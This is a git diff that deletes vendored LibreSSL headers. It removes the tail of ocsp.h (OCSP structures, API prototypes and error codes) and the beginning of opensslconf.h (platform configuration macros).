-/*   OCSPResponse ::= SEQUENCE {
- *      responseStatus         OCSPResponseStatus,
- *      responseBytes          [0] EXPLICIT ResponseBytes OPTIONAL }
- */
-struct ocsp_response_st {
-	ASN1_ENUMERATED *responseStatus;
-	OCSP_RESPBYTES  *responseBytes;
-};
-
-/*   ResponderID ::= CHOICE {
- *      byName   [1] Name,
- *      byKey    [2] KeyHash }
- */
-#define V_OCSP_RESPID_NAME 0
-#define V_OCSP_RESPID_KEY  1
-struct ocsp_responder_id_st {
-	int type;
-	union {
-		X509_NAME* byName;
-		ASN1_OCTET_STRING *byKey;
-	} value;
-};
-
-DECLARE_STACK_OF(OCSP_RESPID)
-OCSP_RESPID *OCSP_RESPID_new(void);
-void OCSP_RESPID_free(OCSP_RESPID *a);
-OCSP_RESPID *d2i_OCSP_RESPID(OCSP_RESPID **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPID(OCSP_RESPID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPID_it;
-
-/*   KeyHash ::= OCTET STRING --SHA-1 hash of responder's public key
- *                            --(excluding the tag and length fields)
- */
-
-/*   RevokedInfo ::= SEQUENCE {
- *       revocationTime              GeneralizedTime,
- *       revocationReason    [0]     EXPLICIT CRLReason OPTIONAL }
- */
-typedef struct ocsp_revoked_info_st {
-	ASN1_GENERALIZEDTIME *revocationTime;
-	ASN1_ENUMERATED *revocationReason;
-} OCSP_REVOKEDINFO;
-
-/*   CertStatus ::= CHOICE {
- *       good                [0]     IMPLICIT NULL,
- *       revoked             [1]     IMPLICIT RevokedInfo,
- *       unknown             [2]     IMPLICIT UnknownInfo }
- */
-#define V_OCSP_CERTSTATUS_GOOD    0
-#define V_OCSP_CERTSTATUS_REVOKED 1
-#define V_OCSP_CERTSTATUS_UNKNOWN 2
-typedef struct ocsp_cert_status_st {
-	int type;
-	union {
-		ASN1_NULL *good;
-		OCSP_REVOKEDINFO *revoked;
-		ASN1_NULL *unknown;
-	} value;
-} OCSP_CERTSTATUS;
-
-/*   SingleResponse ::= SEQUENCE {
- *      certID                       CertID,
- *      certStatus                   CertStatus,
- *      thisUpdate                   GeneralizedTime,
- *      nextUpdate           [0]     EXPLICIT GeneralizedTime OPTIONAL,
- *      singleExtensions     [1]     EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_single_response_st {
-	OCSP_CERTID *certId;
-	OCSP_CERTSTATUS *certStatus;
-	ASN1_GENERALIZEDTIME *thisUpdate;
-	ASN1_GENERALIZEDTIME *nextUpdate;
-	STACK_OF(X509_EXTENSION) *singleExtensions;
-} OCSP_SINGLERESP;
-
-DECLARE_STACK_OF(OCSP_SINGLERESP)
-
-/*   ResponseData ::= SEQUENCE {
- *      version              [0] EXPLICIT Version DEFAULT v1,
- *      responderID              ResponderID,
- *      producedAt               GeneralizedTime,
- *      responses                SEQUENCE OF SingleResponse,
- *      responseExtensions   [1] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_response_data_st {
-	ASN1_INTEGER *version;
-	OCSP_RESPID  *responderId;
-	ASN1_GENERALIZEDTIME *producedAt;
-	STACK_OF(OCSP_SINGLERESP) *responses;
-	STACK_OF(X509_EXTENSION) *responseExtensions;
-} OCSP_RESPDATA;
-
-/*   BasicOCSPResponse       ::= SEQUENCE {
- *      tbsResponseData      ResponseData,
- *      signatureAlgorithm   AlgorithmIdentifier,
- *      signature            BIT STRING,
- *      certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
- */
-  /* Note 1:
-     The value for "signature" is specified in the OCSP rfc2560 as follows:
-     "The value for the signature SHALL be computed on the hash of the DER
-     encoding ResponseData."  This means that you must hash the DER-encoded
-     tbsResponseData, and then run it through a crypto-signing function, which
-     will (at least w/RSA) do a hash-'n'-private-encrypt operation.  This seems
-     a bit odd, but that's the spec.  Also note that the data structures do not
-     leave anywhere to independently specify the algorithm used for the initial
-     hash. So, we look at the signature-specification algorithm, and try to do
-     something intelligent.	-- Kathy Weinhold, CertCo */
-  /* Note 2:
-     It seems that the mentioned passage from RFC 2560 (section 4.2.1) is open
-     for interpretation.  I've done tests against another responder, and found
-     that it doesn't do the double hashing that the RFC seems to say one
-     should.  Therefore, all relevant functions take a flag saying which
-     variant should be used.	-- Richard Levitte, OpenSSL team and CeloCom */
-typedef struct ocsp_basic_response_st {
-	OCSP_RESPDATA *tbsResponseData;
-	X509_ALGOR *signatureAlgorithm;
-	ASN1_BIT_STRING *signature;
-	STACK_OF(X509) *certs;
-} OCSP_BASICRESP;
-
-/*
- *   CRLReason ::= ENUMERATED {
- *        unspecified             (0),
- *        keyCompromise           (1),
- *        cACompromise            (2),
- *        affiliationChanged      (3),
- *        superseded              (4),
- *        cessationOfOperation    (5),
- *        certificateHold         (6),
- *        removeFromCRL           (8) }
- */
-#define OCSP_REVOKED_STATUS_NOSTATUS			-1
-#define OCSP_REVOKED_STATUS_UNSPECIFIED			0
-#define OCSP_REVOKED_STATUS_KEYCOMPROMISE		1
-#define OCSP_REVOKED_STATUS_CACOMPROMISE		2
-#define OCSP_REVOKED_STATUS_AFFILIATIONCHANGED		3
-#define OCSP_REVOKED_STATUS_SUPERSEDED			4
-#define OCSP_REVOKED_STATUS_CESSATIONOFOPERATION	5
-#define OCSP_REVOKED_STATUS_CERTIFICATEHOLD		6
-#define OCSP_REVOKED_STATUS_REMOVEFROMCRL		8
-
-/* CrlID ::= SEQUENCE {
- *     crlUrl               [0]     EXPLICIT IA5String OPTIONAL,
- *     crlNum               [1]     EXPLICIT INTEGER OPTIONAL,
- *     crlTime              [2]     EXPLICIT GeneralizedTime OPTIONAL }
- */
-typedef struct ocsp_crl_id_st {
-	ASN1_IA5STRING *crlUrl;
-	ASN1_INTEGER *crlNum;
-	ASN1_GENERALIZEDTIME *crlTime;
-} OCSP_CRLID;
-
-/* ServiceLocator ::= SEQUENCE {
- *      issuer    Name,
- *      locator   AuthorityInfoAccessSyntax OPTIONAL }
- */
-typedef struct ocsp_service_locator_st {
-	X509_NAME* issuer;
-	STACK_OF(ACCESS_DESCRIPTION) *locator;
-} OCSP_SERVICELOC;
-
-#define PEM_STRING_OCSP_REQUEST	"OCSP REQUEST"
-#define PEM_STRING_OCSP_RESPONSE "OCSP RESPONSE"
-
-#define	PEM_read_bio_OCSP_REQUEST(bp,x,cb) \
-    (OCSP_REQUEST *)PEM_ASN1_read_bio((char *(*)())d2i_OCSP_REQUEST, \
-	PEM_STRING_OCSP_REQUEST,bp,(char **)x,cb,NULL)
-
-#define	PEM_read_bio_OCSP_RESPONSE(bp,x,cb) \
-    (OCSP_RESPONSE *)PEM_ASN1_read_bio((char *(*)())d2i_OCSP_RESPONSE, \
-	PEM_STRING_OCSP_RESPONSE,bp,(char **)x,cb,NULL)
-
-#define PEM_write_bio_OCSP_REQUEST(bp,o) \
-    PEM_ASN1_write_bio((int (*)())i2d_OCSP_REQUEST,PEM_STRING_OCSP_REQUEST,\
-	bp,(char *)o, NULL,NULL,0,NULL,NULL)
-
-#define PEM_write_bio_OCSP_RESPONSE(bp,o) \
-    PEM_ASN1_write_bio((int (*)())i2d_OCSP_RESPONSE,PEM_STRING_OCSP_RESPONSE,\
-	bp,(char *)o, NULL,NULL,0,NULL,NULL)
-
-#define OCSP_REQUEST_sign(o,pkey,md) \
-    ASN1_item_sign(&OCSP_REQINFO_it, \
-	o->optionalSignature->signatureAlgorithm,NULL, \
-	o->optionalSignature->signature,o->tbsRequest,pkey,md)
-
-#define OCSP_BASICRESP_sign(o,pkey,md,d) \
-    ASN1_item_sign(&OCSP_RESPDATA_it,o->signatureAlgorithm,NULL, \
-	o->signature,o->tbsResponseData,pkey,md)
-
-#define OCSP_REQUEST_verify(a,r) \
-    ASN1_item_verify(&OCSP_REQINFO_it, \
-	a->optionalSignature->signatureAlgorithm, \
-	a->optionalSignature->signature,a->tbsRequest,r)
-
-#define OCSP_BASICRESP_verify(a,r,d) \
-    ASN1_item_verify(&OCSP_RESPDATA_it, \
-	a->signatureAlgorithm,a->signature,a->tbsResponseData,r)
-
-#define ASN1_BIT_STRING_digest(data,type,md,len) \
-    ASN1_item_digest(&ASN1_BIT_STRING_it,type,data,md,len)
-
-#define OCSP_CERTSTATUS_dup(cs) \
-	ASN1_item_dup(&OCSP_CERTSTATUS_it, cs)
-
-OCSP_CERTID *OCSP_CERTID_dup(OCSP_CERTID *id);
-
-OCSP_RESPONSE *OCSP_sendreq_bio(BIO *b, char *path, OCSP_REQUEST *req);
-OCSP_REQ_CTX *OCSP_sendreq_new(BIO *io, char *path, OCSP_REQUEST *req,
-	    int maxline);
-int	OCSP_sendreq_nbio(OCSP_RESPONSE **presp, OCSP_REQ_CTX *rctx);
-void	OCSP_REQ_CTX_free(OCSP_REQ_CTX *rctx);
-int	OCSP_REQ_CTX_set1_req(OCSP_REQ_CTX *rctx, OCSP_REQUEST *req);
-int	OCSP_REQ_CTX_add1_header(OCSP_REQ_CTX *rctx, const char *name,
-	    const char *value);
-
-OCSP_CERTID *OCSP_cert_to_id(const EVP_MD *dgst, X509 *subject, X509 *issuer);
-
-OCSP_CERTID *OCSP_cert_id_new(const EVP_MD *dgst, X509_NAME *issuerName,
-	    ASN1_BIT_STRING* issuerKey, ASN1_INTEGER *serialNumber);
-
-OCSP_ONEREQ *OCSP_request_add0_id(OCSP_REQUEST *req, OCSP_CERTID *cid);
-
-int	OCSP_request_add1_nonce(OCSP_REQUEST *req, unsigned char *val, int len);
-int	OCSP_basic_add1_nonce(OCSP_BASICRESP *resp, unsigned char *val, int len);
-int	OCSP_check_nonce(OCSP_REQUEST *req, OCSP_BASICRESP *bs);
-int	OCSP_copy_nonce(OCSP_BASICRESP *resp, OCSP_REQUEST *req);
-
-int	OCSP_request_set1_name(OCSP_REQUEST *req, X509_NAME *nm);
-int	OCSP_request_add1_cert(OCSP_REQUEST *req, X509 *cert);
-
-int	OCSP_request_sign(OCSP_REQUEST *req, X509 *signer, EVP_PKEY *key,
-	    const EVP_MD *dgst, STACK_OF(X509) *certs, unsigned long flags);
-
-int	OCSP_response_status(OCSP_RESPONSE *resp);
-OCSP_BASICRESP *OCSP_response_get1_basic(OCSP_RESPONSE *resp);
-
-int	OCSP_resp_count(OCSP_BASICRESP *bs);
-OCSP_SINGLERESP *OCSP_resp_get0(OCSP_BASICRESP *bs, int idx);
-int	OCSP_resp_find(OCSP_BASICRESP *bs, OCSP_CERTID *id, int last);
-int	OCSP_single_get0_status(OCSP_SINGLERESP *single, int *reason,
-	    ASN1_GENERALIZEDTIME **revtime, ASN1_GENERALIZEDTIME **thisupd,
-	    ASN1_GENERALIZEDTIME **nextupd);
-int	OCSP_resp_find_status(OCSP_BASICRESP *bs, OCSP_CERTID *id, int *status,
-	    int *reason, ASN1_GENERALIZEDTIME **revtime,
-	    ASN1_GENERALIZEDTIME **thisupd, ASN1_GENERALIZEDTIME **nextupd);
-int	OCSP_check_validity(ASN1_GENERALIZEDTIME *thisupd,
-	    ASN1_GENERALIZEDTIME *nextupd, long sec, long maxsec);
-
-int	OCSP_request_verify(OCSP_REQUEST *req, STACK_OF(X509) *certs,
-	    X509_STORE *store, unsigned long flags);
-
-int	OCSP_parse_url(char *url, char **phost, char **pport, char **ppath,
-	    int *pssl);
-
-int	OCSP_id_issuer_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
-int	OCSP_id_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
-
-int	OCSP_request_onereq_count(OCSP_REQUEST *req);
-OCSP_ONEREQ *OCSP_request_onereq_get0(OCSP_REQUEST *req, int i);
-OCSP_CERTID *OCSP_onereq_get0_id(OCSP_ONEREQ *one);
-int	OCSP_id_get0_info(ASN1_OCTET_STRING **piNameHash, ASN1_OBJECT **pmd,
-	    ASN1_OCTET_STRING **pikeyHash, ASN1_INTEGER **pserial,
-	    OCSP_CERTID *cid);
-int	OCSP_request_is_signed(OCSP_REQUEST *req);
-OCSP_RESPONSE *OCSP_response_create(int status, OCSP_BASICRESP *bs);
-OCSP_SINGLERESP *OCSP_basic_add1_status(OCSP_BASICRESP *rsp, OCSP_CERTID *cid,
-	    int status, int reason, ASN1_TIME *revtime, ASN1_TIME *thisupd,
-	    ASN1_TIME *nextupd);
-int	OCSP_basic_add1_cert(OCSP_BASICRESP *resp, X509 *cert);
-int	OCSP_basic_sign(OCSP_BASICRESP *brsp, X509 *signer, EVP_PKEY *key,
-	    const EVP_MD *dgst, STACK_OF(X509) *certs, unsigned long flags);
-
-X509_EXTENSION *OCSP_crlID_new(char *url, long *n, char *tim);
-
-X509_EXTENSION *OCSP_accept_responses_new(char **oids);
-
-X509_EXTENSION *OCSP_archive_cutoff_new(char* tim);
-
-X509_EXTENSION *OCSP_url_svcloc_new(X509_NAME* issuer, char **urls);
-
-int	OCSP_REQUEST_get_ext_count(OCSP_REQUEST *x);
-int	OCSP_REQUEST_get_ext_by_NID(OCSP_REQUEST *x, int nid, int lastpos);
-int	OCSP_REQUEST_get_ext_by_OBJ(OCSP_REQUEST *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_REQUEST_get_ext_by_critical(OCSP_REQUEST *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_REQUEST_get_ext(OCSP_REQUEST *x, int loc);
-X509_EXTENSION *OCSP_REQUEST_delete_ext(OCSP_REQUEST *x, int loc);
-void *OCSP_REQUEST_get1_ext_d2i(OCSP_REQUEST *x, int nid, int *crit, int *idx);
-int	OCSP_REQUEST_add1_ext_i2d(OCSP_REQUEST *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_REQUEST_add_ext(OCSP_REQUEST *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_ONEREQ_get_ext_count(OCSP_ONEREQ *x);
-int	OCSP_ONEREQ_get_ext_by_NID(OCSP_ONEREQ *x, int nid, int lastpos);
-int	OCSP_ONEREQ_get_ext_by_OBJ(OCSP_ONEREQ *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_ONEREQ_get_ext_by_critical(OCSP_ONEREQ *x, int crit, int lastpos);
-X509_EXTENSION *OCSP_ONEREQ_get_ext(OCSP_ONEREQ *x, int loc);
-X509_EXTENSION *OCSP_ONEREQ_delete_ext(OCSP_ONEREQ *x, int loc);
-void *OCSP_ONEREQ_get1_ext_d2i(OCSP_ONEREQ *x, int nid, int *crit, int *idx);
-int	OCSP_ONEREQ_add1_ext_i2d(OCSP_ONEREQ *x, int nid, void *value, int crit,
-	    unsigned long flags);
-int	OCSP_ONEREQ_add_ext(OCSP_ONEREQ *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_BASICRESP_get_ext_count(OCSP_BASICRESP *x);
-int	OCSP_BASICRESP_get_ext_by_NID(OCSP_BASICRESP *x, int nid, int lastpos);
-int	OCSP_BASICRESP_get_ext_by_OBJ(OCSP_BASICRESP *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_BASICRESP_get_ext_by_critical(OCSP_BASICRESP *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_BASICRESP_get_ext(OCSP_BASICRESP *x, int loc);
-X509_EXTENSION *OCSP_BASICRESP_delete_ext(OCSP_BASICRESP *x, int loc);
-void *OCSP_BASICRESP_get1_ext_d2i(OCSP_BASICRESP *x, int nid, int *crit,
-	    int *idx);
-int	OCSP_BASICRESP_add1_ext_i2d(OCSP_BASICRESP *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_BASICRESP_add_ext(OCSP_BASICRESP *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_SINGLERESP_get_ext_count(OCSP_SINGLERESP *x);
-int	OCSP_SINGLERESP_get_ext_by_NID(OCSP_SINGLERESP *x, int nid,
-	    int lastpos);
-int	OCSP_SINGLERESP_get_ext_by_OBJ(OCSP_SINGLERESP *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_SINGLERESP_get_ext_by_critical(OCSP_SINGLERESP *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_SINGLERESP_get_ext(OCSP_SINGLERESP *x, int loc);
-X509_EXTENSION *OCSP_SINGLERESP_delete_ext(OCSP_SINGLERESP *x, int loc);
-void *OCSP_SINGLERESP_get1_ext_d2i(OCSP_SINGLERESP *x, int nid, int *crit,
-	    int *idx);
-int	OCSP_SINGLERESP_add1_ext_i2d(OCSP_SINGLERESP *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_SINGLERESP_add_ext(OCSP_SINGLERESP *x, X509_EXTENSION *ex,
-	    int loc);
-
-OCSP_SINGLERESP *OCSP_SINGLERESP_new(void);
-void OCSP_SINGLERESP_free(OCSP_SINGLERESP *a);
-OCSP_SINGLERESP *d2i_OCSP_SINGLERESP(OCSP_SINGLERESP **a, const unsigned char **in, long len);
-int i2d_OCSP_SINGLERESP(OCSP_SINGLERESP *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SINGLERESP_it;
-OCSP_CERTSTATUS *OCSP_CERTSTATUS_new(void);
-void OCSP_CERTSTATUS_free(OCSP_CERTSTATUS *a);
-OCSP_CERTSTATUS *d2i_OCSP_CERTSTATUS(OCSP_CERTSTATUS **a, const unsigned char **in, long len);
-int i2d_OCSP_CERTSTATUS(OCSP_CERTSTATUS *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CERTSTATUS_it;
-OCSP_REVOKEDINFO *OCSP_REVOKEDINFO_new(void);
-void OCSP_REVOKEDINFO_free(OCSP_REVOKEDINFO *a);
-OCSP_REVOKEDINFO *d2i_OCSP_REVOKEDINFO(OCSP_REVOKEDINFO **a, const unsigned char **in, long len);
-int i2d_OCSP_REVOKEDINFO(OCSP_REVOKEDINFO *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_REVOKEDINFO_it;
-OCSP_BASICRESP *OCSP_BASICRESP_new(void);
-void OCSP_BASICRESP_free(OCSP_BASICRESP *a);
-OCSP_BASICRESP *d2i_OCSP_BASICRESP(OCSP_BASICRESP **a, const unsigned char **in, long len);
-int i2d_OCSP_BASICRESP(OCSP_BASICRESP *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_BASICRESP_it;
-OCSP_RESPDATA *OCSP_RESPDATA_new(void);
-void OCSP_RESPDATA_free(OCSP_RESPDATA *a);
-OCSP_RESPDATA *d2i_OCSP_RESPDATA(OCSP_RESPDATA **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPDATA(OCSP_RESPDATA *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPDATA_it;
-OCSP_RESPID *OCSP_RESPID_new(void);
-void OCSP_RESPID_free(OCSP_RESPID *a);
-OCSP_RESPID *d2i_OCSP_RESPID(OCSP_RESPID **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPID(OCSP_RESPID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPID_it;
-OCSP_RESPONSE *OCSP_RESPONSE_new(void);
-void OCSP_RESPONSE_free(OCSP_RESPONSE *a);
-OCSP_RESPONSE *d2i_OCSP_RESPONSE(OCSP_RESPONSE **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPONSE(OCSP_RESPONSE *a, unsigned char **out);
-OCSP_RESPONSE *d2i_OCSP_RESPONSE_bio(BIO *bp, OCSP_RESPONSE **a);
-int i2d_OCSP_RESPONSE_bio(BIO *bp, OCSP_RESPONSE *a);
-extern const ASN1_ITEM OCSP_RESPONSE_it;
-OCSP_RESPBYTES *OCSP_RESPBYTES_new(void);
-void OCSP_RESPBYTES_free(OCSP_RESPBYTES *a);
-OCSP_RESPBYTES *d2i_OCSP_RESPBYTES(OCSP_RESPBYTES **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPBYTES(OCSP_RESPBYTES *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPBYTES_it;
-OCSP_ONEREQ *OCSP_ONEREQ_new(void);
-void OCSP_ONEREQ_free(OCSP_ONEREQ *a);
-OCSP_ONEREQ *d2i_OCSP_ONEREQ(OCSP_ONEREQ **a, const unsigned char **in, long len);
-int i2d_OCSP_ONEREQ(OCSP_ONEREQ *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_ONEREQ_it;
-OCSP_CERTID *OCSP_CERTID_new(void);
-void OCSP_CERTID_free(OCSP_CERTID *a);
-OCSP_CERTID *d2i_OCSP_CERTID(OCSP_CERTID **a, const unsigned char **in, long len);
-int i2d_OCSP_CERTID(OCSP_CERTID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CERTID_it;
-OCSP_REQUEST *OCSP_REQUEST_new(void);
-void OCSP_REQUEST_free(OCSP_REQUEST *a);
-OCSP_REQUEST *d2i_OCSP_REQUEST(OCSP_REQUEST **a, const unsigned char **in, long len);
-int i2d_OCSP_REQUEST(OCSP_REQUEST *a, unsigned char **out);
-OCSP_REQUEST *d2i_OCSP_REQUEST_bio(BIO *bp, OCSP_REQUEST **a);
-int i2d_OCSP_REQUEST_bio(BIO *bp, OCSP_REQUEST *a);
-extern const ASN1_ITEM OCSP_REQUEST_it;
-OCSP_SIGNATURE *OCSP_SIGNATURE_new(void);
-void OCSP_SIGNATURE_free(OCSP_SIGNATURE *a);
-OCSP_SIGNATURE *d2i_OCSP_SIGNATURE(OCSP_SIGNATURE **a, const unsigned char **in, long len);
-int i2d_OCSP_SIGNATURE(OCSP_SIGNATURE *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SIGNATURE_it;
-OCSP_REQINFO *OCSP_REQINFO_new(void);
-void OCSP_REQINFO_free(OCSP_REQINFO *a);
-OCSP_REQINFO *d2i_OCSP_REQINFO(OCSP_REQINFO **a, const unsigned char **in, long len);
-int i2d_OCSP_REQINFO(OCSP_REQINFO *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_REQINFO_it;
-OCSP_CRLID *OCSP_CRLID_new(void);
-void OCSP_CRLID_free(OCSP_CRLID *a);
-OCSP_CRLID *d2i_OCSP_CRLID(OCSP_CRLID **a, const unsigned char **in, long len);
-int i2d_OCSP_CRLID(OCSP_CRLID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CRLID_it;
-OCSP_SERVICELOC *OCSP_SERVICELOC_new(void);
-void OCSP_SERVICELOC_free(OCSP_SERVICELOC *a);
-OCSP_SERVICELOC *d2i_OCSP_SERVICELOC(OCSP_SERVICELOC **a, const unsigned char **in, long len);
-int i2d_OCSP_SERVICELOC(OCSP_SERVICELOC *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SERVICELOC_it;
-
-const char *OCSP_response_status_str(long s);
-const char *OCSP_cert_status_str(long s);
-const char *OCSP_crl_reason_str(long s);
-
-int	OCSP_REQUEST_print(BIO *bp, OCSP_REQUEST* a, unsigned long flags);
-int	OCSP_RESPONSE_print(BIO *bp, OCSP_RESPONSE* o, unsigned long flags);
-
-int	OCSP_basic_verify(OCSP_BASICRESP *bs, STACK_OF(X509) *certs,
-	    X509_STORE *st, unsigned long flags);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_OCSP_strings(void);
-
-/* Error codes for the OCSP functions. */
-
-/* Function codes. */
-#define OCSP_F_ASN1_STRING_ENCODE			 100
-#define OCSP_F_D2I_OCSP_NONCE				 102
-#define OCSP_F_OCSP_BASIC_ADD1_STATUS			 103
-#define OCSP_F_OCSP_BASIC_SIGN				 104
-#define OCSP_F_OCSP_BASIC_VERIFY			 105
-#define OCSP_F_OCSP_CERT_ID_NEW				 101
-#define OCSP_F_OCSP_CHECK_DELEGATED			 106
-#define OCSP_F_OCSP_CHECK_IDS				 107
-#define OCSP_F_OCSP_CHECK_ISSUER			 108
-#define OCSP_F_OCSP_CHECK_VALIDITY			 115
-#define OCSP_F_OCSP_MATCH_ISSUERID			 109
-#define OCSP_F_OCSP_PARSE_URL				 114
-#define OCSP_F_OCSP_REQUEST_SIGN			 110
-#define OCSP_F_OCSP_REQUEST_VERIFY			 116
-#define OCSP_F_OCSP_RESPONSE_GET1_BASIC			 111
-#define OCSP_F_OCSP_SENDREQ_BIO				 112
-#define OCSP_F_OCSP_SENDREQ_NBIO			 117
-#define OCSP_F_PARSE_HTTP_LINE1				 118
-#define OCSP_F_REQUEST_VERIFY				 113
-
-/* Reason codes. */
-#define OCSP_R_BAD_DATA					 100
-#define OCSP_R_CERTIFICATE_VERIFY_ERROR			 101
-#define OCSP_R_DIGEST_ERR				 102
-#define OCSP_R_ERROR_IN_NEXTUPDATE_FIELD		 122
-#define OCSP_R_ERROR_IN_THISUPDATE_FIELD		 123
-#define OCSP_R_ERROR_PARSING_URL			 121
-#define OCSP_R_MISSING_OCSPSIGNING_USAGE		 103
-#define OCSP_R_NEXTUPDATE_BEFORE_THISUPDATE		 124
-#define OCSP_R_NOT_BASIC_RESPONSE			 104
-#define OCSP_R_NO_CERTIFICATES_IN_CHAIN			 105
-#define OCSP_R_NO_CONTENT				 106
-#define OCSP_R_NO_PUBLIC_KEY				 107
-#define OCSP_R_NO_RESPONSE_DATA				 108
-#define OCSP_R_NO_REVOKED_TIME				 109
-#define OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 110
-#define OCSP_R_REQUEST_NOT_SIGNED			 128
-#define OCSP_R_RESPONSE_CONTAINS_NO_REVOCATION_DATA	 111
-#define OCSP_R_ROOT_CA_NOT_TRUSTED			 112
-#define OCSP_R_SERVER_READ_ERROR			 113
-#define OCSP_R_SERVER_RESPONSE_ERROR			 114
-#define OCSP_R_SERVER_RESPONSE_PARSE_ERROR		 115
-#define OCSP_R_SERVER_WRITE_ERROR			 116
-#define OCSP_R_SIGNATURE_FAILURE			 117
-#define OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND		 118
-#define OCSP_R_STATUS_EXPIRED				 125
-#define OCSP_R_STATUS_NOT_YET_VALID			 126
-#define OCSP_R_STATUS_TOO_OLD				 127
-#define OCSP_R_UNKNOWN_MESSAGE_DIGEST			 119
-#define OCSP_R_UNKNOWN_NID				 120
-#define OCSP_R_UNSUPPORTED_REQUESTORNAME_TYPE		 129
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/opensslconf.h b/thirdparty/libressl/include/openssl/opensslconf.h
deleted file mode 100644
index bb71768..0000000
--- a/thirdparty/libressl/include/openssl/opensslconf.h
+++ /dev/null
@@ -1,153 +0,0 @@
-#include <openssl/opensslfeatures.h>
-/* crypto/opensslconf.h.in */
-
-#if defined(_MSC_VER) && !defined(__attribute__)
-#define __attribute__(a)
-#endif
-
-#if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
-#define OPENSSLDIR "/etc/ssl"
-#endif
-
-#undef OPENSSL_UNISTD
-#define OPENSSL_UNISTD <unistd.h>
-
-#undef OPENSSL_EXPORT_VAR_AS_FUNCTION
-
-#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
-#define IDEA_INT unsigned int
-#endif
-
-#if defined(HEADER_MD2_H) && !defined(MD2_INT)
-#define MD2_INT unsigned int
-#endif
-
-#if defined(HEADER_RC2_H) && !defined(RC2_INT)
-/* I need to put in a mod for the alpha - eay */
-#define RC2_INT unsigned int
-#endif
-
-#if defined(HEADER_RC4_H)
-#if !defined(RC4_INT)
-/* using int types make the structure larger but make the code faster
- * on most boxes I have tested - up to %20 faster. */
-/*
- * I don't know what does "most" mean, but declaring "int" is a must on:
- * - Intel P6 because partial register stalls are very expensive;
- * - elder Alpha because it lacks byte load/store instructions;
- */
-#define RC4_INT unsigned int
-#endif
-#if !defined(RC4_CHUNK)
-/*
- * This enables code handling data aligned at natural CPU word
- * boundary. See crypto/rc4/rc4_enc.c for further details.
- */
-#define RC4_CHUNK unsigned long
-#endif
-#endif
-
-#if (defined(HEADER_NEW_DES_H) || defined(HEADER_DES_H)) && !defined(DES_LONG)
-/* If this is set to 'unsigned int' on a DEC Alpha, this gives about a
- * %20 speed up (longs are 8 bytes, int's are 4). */
-#ifndef DES_LONG
-#define DES_LONG unsigned int
-#endif
-#endif
-
-#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
-#define CONFIG_HEADER_BN_H
-#undef BN_LLONG
-
-/* Should we define BN_DIV2W here? */
-
-/* Only one for the following should be defined */
-#define SIXTY_FOUR_BIT_LONG
-#undef SIXTY_FOUR_BIT
-#undef THIRTY_TWO_BIT
-#endif
-
-#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
-#define CONFIG_HEADER_RC4_LOCL_H
-/* if this is defined data[i] is used instead of *data, this is a %20
- * speedup on x86 */
-#undef RC4_INDEX
-#endif
-
-#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
-#define CONFIG_HEADER_BF_LOCL_H
-#undef BF_PTR
-#endif /* HEADER_BF_LOCL_H */
-
-#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
-#define CONFIG_HEADER_DES_LOCL_H
-#ifndef DES_DEFAULT_OPTIONS
-/* the following is tweaked from a config script, that is why it is a
- * protected undef/define */
-#ifndef DES_PTR
-#undef DES_PTR
-#endif
-
-/* This helps C compiler generate the correct code for multiple functional
- * units.  It reduces register dependancies at the expense of 2 more
- * registers */
-#ifndef DES_RISC1
-#undef DES_RISC1
-#endif
-
-#ifndef DES_RISC2
-#undef DES_RISC2
-#endif
-
-#if defined(DES_RISC1) && defined(DES_RISC2)
-YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED!!!!!
-#endif
-
-/* Unroll the inner loop, this sometimes helps, sometimes hinders.
- * Very mucy CPU dependant */
-#ifndef DES_UNROLL
-#define DES_UNROLL
-#endif
-
